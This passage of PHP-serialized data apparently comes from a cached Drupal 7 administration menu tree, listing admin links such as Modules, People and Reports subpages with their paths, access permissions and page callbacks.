functionality.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-2\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"16\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:36:\"a:1:{i:0;s:18:\"administer modules\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:32:\"a:1:{i:0;s:14:\"system_modules\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:13:\"admin/modules\";s:5:\"title\";s:7:\"Modules\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:26:\"Extend site functionality.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:18;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"18\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:12:\"admin/people\";s:11:\"router_path\";s:12:\"admin/people\";s:10:\"link_title\";s:6:\"People\";s:7:\"options\";s:95:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:45:\"Manage user accounts, roles, and permissions.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-4\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"18\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:34:\"a:1:{i:0;s:16:\"administer users\";}\";s:13:\"page_callback\";s:10:\"user_admin\";s:14:\"page_arguments\";s:21:\"a:1:{i:0;s:4:\"list\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:12:\"admin/people\";s:5:\"title\";s:6:\"People\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:45:\"Manage user accounts, roles, and permissions.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:19;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"19\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:13:\"admin/reports\";s:11:\"router_path\";s:13:\"admin/reports\";s:10:\"link_title\";s:7:\"Reports\";s:7:\"options\";s:84:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:34:\"View reports, updates, and errors.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"5\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:37:\"a:1:{i:0;s:19:\"access site reports\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:13:\"admin/reports\";s:5:\"title\";s:7:\"Reports\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:34:\"View reports, updates, and errors.\";s:15:\"in_active_trail\";b:1;}s:5:\"below\";a:14:{i:42;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"42\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:20:\"admin/reports/fields\";s:11:\"router_path\";s:20:\"admin/reports/fields\";s:10:\"link_title\";s:10:\"Field list\";s:7:\"options\";s:89:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:39:\"Overview of fields on all entity types.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:2:\"42\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:42:\"a:1:{i:0;s:24:\"administer content types\";}\";s:13:\"page_callback\";s:20:\"field_ui_fields_list\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:20:\"admin/reports/fields\";s:5:\"title\";s:10:\"Field list\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:39:\"Overview of fields on all entity types.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:50;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"50\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:19:\"admin/reports/dblog\";s:11:\"router_path\";s:19:\"admin/reports/dblog\";s:10:\"link_title\";s:19:\"Recent log messages\";s:7:\"options\";s:93:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:43:\"View events that have recently been logged.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-1\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:2:\"50\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:37:\"a:1:{i:0;s:19:\"access site reports\";}\";s:13:\"page_callback\";s:14:\"dblog_overview\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:19:\"admin/reports/dblog\";s:5:\"title\";s:19:\"Recent log messages\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:43:\"View events that have recently been logged.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:55;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"55\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:20:\"admin/reports/status\";s:11:\"router_path\";s:20:\"admin/reports/status\";s:10:\"link_title\";s:13:\"Status report\";s:7:\"options\";s:124:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:74:\"Get a status report about your site\'s operation and any detected problems.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-60\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:2:\"55\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:47:\"a:1:{i:0;s:29:\"administer site configuration\";}\";s:13:\"page_callback\";s:13:\"system_status\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:20:\"admin/reports/status\";s:5:\"title\";s:13:\"Status report\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:74:\"Get a status report about your site\'s operation and any detected problems.\";s:15:\"in_active_trail\";b:1;}s:5:\"below\";a:0:{}}i:58;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"58\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:27:\"admin/reports/access-denied\";s:11:\"router_path\";s:27:\"admin/reports/access-denied\";s:10:\"link_title\";s:26:\"Top \'access denied\' errors\";s:7:\"options\";s:85:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:35:\"View \'access denied\' errors (403s).\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:2:\"58\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:37:\"a:1:{i:0;s:19:\"access site reports\";}\";s:13:\"page_callback\";s:9:\"dblog_top\";s:14:\"page_arguments\";s:31:\"a:1:{i:0;s:13:\"access denied\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:27:\"admin/reports/access-denied\";s:5:\"title\";s:26:\"Top \'access denied\' errors\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:35:\"View \'access denied\' errors (403s).\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:59;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"59\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:28:\"admin/reports/page-not-found\";s:11:\"router_path\";s:28:\"admin/reports/page-not-found\";s:10:\"link_title\";s:27:\"Top \'page not found\' errors\";s:7:\"options\";s:86:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:36:\"View \'page not found\' errors (404s).\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:2:\"59\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:37:\"a:1:{i:0;s:19:\"access site reports\";}\";s:13:\"page_callback\";s:9:\"dblog_top\";s:14:\"page_arguments\";s:32:\"a:1:{i:0;s:14:\"page not found\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:28:\"admin/reports/page-not-found\";s:5:\"title\";s:27:\"Top \'page not found\' errors\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:36:\"View \'page not found\' errors (404s).\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:100;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"100\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:21:\"admin/reports/event/%\";s:11:\"router_path\";s:21:\"admin/reports/event/%\";s:10:\"link_title\";s:7:\"Details\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:3:\"100\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:12:\"a:1:{i:3;N;}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:37:\"a:1:{i:0;s:19:\"access site reports\";}\";s:13:\"page_callback\";s:11:\"dblog_event\";s:14:\"page_arguments\";s:14:\"a:1:{i:0;i:3;}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:21:\"admin/reports/event/%\";s:5:\"title\";s:7:\"Details\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:192;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"192\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:20:\"admin/reports/search\";s:11:\"router_path\";s:20:\"admin/reports/search\";s:10:\"link_title\";s:18:\"Top search phrases\";s:7:\"options\";s:83:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:33:\"View most popular search phrases.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:3:\"192\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:37:\"a:1:{i:0;s:19:\"access site reports\";}\";s:13:\"page_callback\";s:9:\"dblog_top\";s:14:\"page_arguments\";s:23:\"a:1:{i:0;s:6:\"search\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:20:\"admin/reports/search\";s:5:\"title\";s:18:\"Top search phrases\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:33:\"View most popular search phrases.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:298;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"298\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:21:\"admin/reports/updates\";s:11:\"router_path\";s:21:\"admin/reports/updates\";s:10:\"link_title\";s:17:\"Available updates\";s:7:\"options\";s:132:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:82:\"Get a status report about available updates for your installed modules and themes.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-50\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:3:\"298\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:47:\"a:1:{i:0;s:29:\"administer site configuration\";}\";s:13:\"page_callback\";s:13:\"update_status\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:21:\"admin/reports/updates\";s:5:\"title\";s:17:\"Available updates\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:82:\"Get a status report about available updates for your installed modules and themes.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:402;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"402\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:18:\"admin/reports/hits\";s:11:\"router_path\";s:18:\"admin/reports/hits\";s:10:\"link_title\";s:11:\"Recent hits\";s:7:\"options\";s:93:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:43:\"View pages that have recently been visited.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:3:\"402\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:35:\"a:1:{i:0;s:17:\"access statistics\";}\";s:13:\"page_callback\";s:22:\"statistics_recent_hits\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:18:\"admin/reports/hits\";s:5:\"title\";s:11:\"Recent hits\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:43:\"View pages that have recently been visited.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:403;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"403\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:19:\"admin/reports/pages\";s:11:\"router_path\";s:19:\"admin/reports/pages\";s:10:\"link_title\";s:9:\"Top pages\";s:7:\"options\";s:91:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:41:\"View pages that have been hit frequently.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"1\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:3:\"403\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:35:\"a:1:{i:0;s:17:\"access statistics\";}\";s:13:\"page_callback\";s:20:\"statistics_top_pages\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:19:\"admin/reports/pages\";s:5:\"title\";s:9:\"Top pages\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:41:\"View pages that have been hit frequently.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:404;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"404\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:23:\"admin/reports/referrers\";s:11:\"router_path\";s:23:\"admin/reports/referrers\";s:10:\"link_title\";s:13:\"Top referrers\";s:7:\"options\";s:69:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:19:\"View top referrers.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:3:\"404\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:35:\"a:1:{i:0;s:17:\"access statistics\";}\";s:13:\"page_callback\";s:24:\"statistics_top_referrers\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:23:\"admin/reports/referrers\";s:5:\"title\";s:13:\"Top referrers\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:19:\"View top referrers.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:405;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"405\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:22:\"admin/reports/visitors\";s:11:\"router_path\";s:22:\"admin/reports/visitors\";s:10:\"link_title\";s:12:\"Top visitors\";s:7:\"options\";s:84:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:34:\"View visitors that hit many pages.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"2\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:3:\"405\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:35:\"a:1:{i:0;s:17:\"access statistics\";}\";s:13:\"page_callback\";s:23:\"statistics_top_visitors\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:22:\"admin/reports/visitors\";s:5:\"title\";s:12:\"Top visitors\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:34:\"View visitors that hit many 